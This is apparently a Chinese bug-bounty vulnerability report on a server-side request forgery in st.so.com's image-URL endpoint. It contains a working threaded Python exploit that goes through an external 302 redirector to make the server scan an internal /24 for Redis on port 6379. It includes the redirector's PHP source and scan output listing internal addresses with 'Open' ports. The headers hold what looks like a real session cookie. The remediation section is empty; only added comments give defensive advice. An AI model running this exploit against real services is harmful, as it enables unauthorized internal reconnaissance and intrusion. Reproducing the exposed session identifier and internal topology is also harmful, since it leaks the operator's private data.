漏洞地址:http://st.so.com
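利用 302 跳转绕过 http 协议限制(SSRF,服务端请求伪造):接口的 imgurl 参数只允许 http 地址,但服务端抓取时会跟随外部服务器返回的 302 跳转,跳转后的协议和目标地址不再受该限制,因此请求可以被引向内网。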
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
import requests
import threading
import Queue
import random
import time
# Endpoint the script posts to; the request body carries an `imgurl` form field.
url = "http://st.so.com/stu"
# Number of worker threads started at the bottom of the script.
threads_count = 3
# Work queue of addresses to process (Python 2 `Queue` module).
que = Queue.Queue()
# Serialises the print statements issued by the worker threads.
lock = threading.Lock()
# Holds the Thread objects created at the bottom of the script.
threads = []
# Prefix of the /24 whose host addresses are queued; 10.0.0.0/8 is private
# (RFC 1918) space, i.e. the addresses are internal to the remote network.
ip = "10.121.3."
def getIp():
    """Return a random dotted-quad string with every octet in 1..254.

    The value is only used to fill the client-supplied X-Forwarded-For
    header in ``headers``; it is not an address the script connects to.
    """
    octets = (str(random.randint(1, 254)) for _ in range(4))
    return '.'.join(octets)
# Headers attached to every POST made by run().
# NOTE(review): the Cookie value contains what looks like a real session
# identifier (PHPSESSID); session material should be redacted before a report
# or proof of concept is published.
# X-Forwarded-For is filled by a single getIp() call when this dict is built.
# The header is client-controlled, so a server must not rely on it for source
# attribution or rate limiting unless it was set by a trusted proxy.
headers = {
    "Cache-Control": "max-age=0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36",
    "Cookie": "__guid=6491553.4279294988408965000.1467944097350.527; PHPSESSID=d88gvotjet30c0cp28iuv1s771; count=45",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Forwarded-For": getIp(),
}
# Queue the host addresses <prefix>1 .. <prefix>254 for the worker threads.
for last_octet in range(1, 255):
    que.put("%s%d" % (ip, last_octet))
def run():
    """Worker loop: take addresses from ``que`` and probe each one via ``url``.

    For every queued address two POSTs are sent to ``url``. Each carries an
    ``imgurl`` form field pointing at the external redirector (exp.php), first
    with port 65321 and then with port 6379. The redirector answers with a
    ``Location: ftp://<address>:<port>/helo.jpg`` header, so the connection
    to the internal address is meant to be made by the server behind ``url``,
    not by this client.

    Result handling, as written:
      * first request raises   -> the address is skipped silently;
      * second request returns -> the bare address is printed;
      * second request raises  -> "<address> 6379 Open" is printed.

    NOTE(review): the listing had lost its indentation; the nesting below is
    reconstructed from the try/except pairing. Any exception on the second
    request is reported as "Open" -- presumably the 2.2 s client timeout is the
    intended signal, but the page does not say so.

    Defensive reading: the observable difference between the two requests
    (answer vs. stall/failure) is what leaks internal port state. A server-side
    URL fetcher should accept only http/https, re-check the scheme and the
    resolved address on every redirect hop (or not follow redirects at all),
    refuse private and loopback ranges, and enforce one fixed deadline with a
    uniform error response so outcomes are indistinguishable to the caller.
    """
    redirector = "http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg"
    while que.qsize() > 0:
        target = que.get()
        try:
            # Reference request against port 65321; a failure here drops the address.
            baseline = {"imgurl": redirector.format(ip=target, port="65321")}
            requests.post(url, data=baseline, headers=headers, timeout=2.2)
            try:
                # Same request shape against port 6379.
                probe = {"imgurl": redirector.format(ip=target, port="6379")}
                requests.post(url, data=probe, headers=headers, timeout=2.2)
                lock.acquire()
                print(target)
                lock.release()
            except:
                lock.acquire()
                print("{ip} 6379 Open".format(ip=target))
                lock.release()
        except:
            # Bare except kept as in the original: every error is ignored.
            pass
# Start the worker threads. They are daemon threads, so they do not keep the
# process alive once the main thread leaves the wait loop below.
for _ in range(threads_count):
    worker = threading.Thread(target=run)
    worker.setDaemon(True)
    threads.append(worker)
    worker.start()

# The main thread polls once per second until the queue has been drained.
while not que.empty():
    time.sleep(1.0)
exp.php源码:
// exp.php: the redirector that the imgurl values in the script above point at.
// NOTE(review): the opening <?php tag appears to be missing from this listing.
// All four components of the redirect target are read from the query string
// without any validation.
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
// Sends a Location header (PHP answers with 302 by default) for
// $scheme://$ip:$port/$data. A server-side fetcher that validated only the
// first URL and then follows this redirect ends up on a scheme and host it
// never checked. Defence: validate scheme and resolved address again on every
// hop, or disable redirect following in the fetcher.
header("Location: $scheme://$ip:$port/$data");
?>
10.121.3.1
10.121.3.2
10.121.3.3
10.121.3.4
10.121.3.5
10.121.3.6
10.121.3.9 6379 Open
10.121.3.11
10.121.3.14
10.121.3.13
10.121.3.15
10.121.3.18
10.121.3.16 6379 Open
10.121.3.21
10.121.3.20
10.121.3.24
10.121.3.23 6379 Open
10.121.3.25 6379 Open
10.121.3.28
10.121.3.29
10.121.3.32 6379 Open
10.121.3.34
10.121.3.35
10.121.3.36
10.121.3.37
10.121.3.38
10.121.3.39
10.121.3.41
10.121.3.42
10.121.3.230
10.121.3.231
10.121.3.232
10.121.3.233
10.121.3.234
10.121.3.235
10.121.3.236
10.121.3.237
10.121.3.238
10.121.3.239
10.121.3.240
10.121.3.241
10.121.3.242
10.121.3.243
10.121.3.244
10.121.3.245
10.121.3.246
10.121.3.247
就不深入利用了
解决方案: